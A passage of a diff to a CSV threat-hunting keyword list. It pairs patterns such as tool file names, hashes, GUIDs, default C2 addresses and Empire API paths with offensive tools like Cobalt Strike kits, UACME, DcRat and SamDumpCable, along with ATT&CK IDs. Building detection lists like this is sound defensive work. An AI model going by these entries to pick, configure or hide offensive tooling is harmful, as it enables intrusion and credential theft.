Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*0evilpwfilter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*0evilpwfilter.dll*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*0vercl0k/udmp-parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" "*0x00-0x00*","offensive_tool_keyword","Github Username","Github pentester username with lots of different exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/0x00-0x00","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*0x09AL/DNS-Persist*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" @@ -6631,300 +6774,300 @@ "*0xdarkvortex-MalwareDevelopment*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*0xdeadbeef*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*0xsp-SRD/mortar*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" -"*0xthirteen/MoveKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*0xthirteen/MoveKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*0xthirteen/PerfExec*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" -"*0xthirteen/SharpRDP*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*0xthirteen/SharpRDP*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*1_FindDomain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*105C2C6D-1C0A-4535-A231-80E355EFB112*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*105C2C6D-1C0A-4535-A231-80E355EFB112*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*10k-worst-pass.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*11385CC1-54B7-4968-9052-DF8BB1961F1E*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*119.45.104.153:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*11385CC1-54B7-4968-9052-DF8BB1961F1E*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*119.45.104.153:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*123abcbde966780cef8d9ec24523acac*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" "*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*127.0.0.1:1080*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" -"*127.0.0.1:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*127.0.0.1:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*127.0.0.1:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*127.0.0.1:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*127.0.0.1:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*127.0.0.1:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*127.0.0.1:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*127.0.0.1:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*127.0.0.1:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*127.0.0.1:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*127.0.0.1:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*1337*/api/agents/*/results?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*1337*/api/creds?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*1337*/api/listeners?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*1337*infernal-twin*","offensive_tool_keyword","infernal-twin","This tool is created to aid the penetration testers in assessing wireless security.","T1533 - T1553 - T1560 - T1569 - T1583","TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/entropy1337/infernal-twin","1","1","N/A","N/A","10","1193","273","2022-10-27T11:39:14Z","2015-02-07T21:04:57Z" -"*1337OMGsam*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*1337OMGsys*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 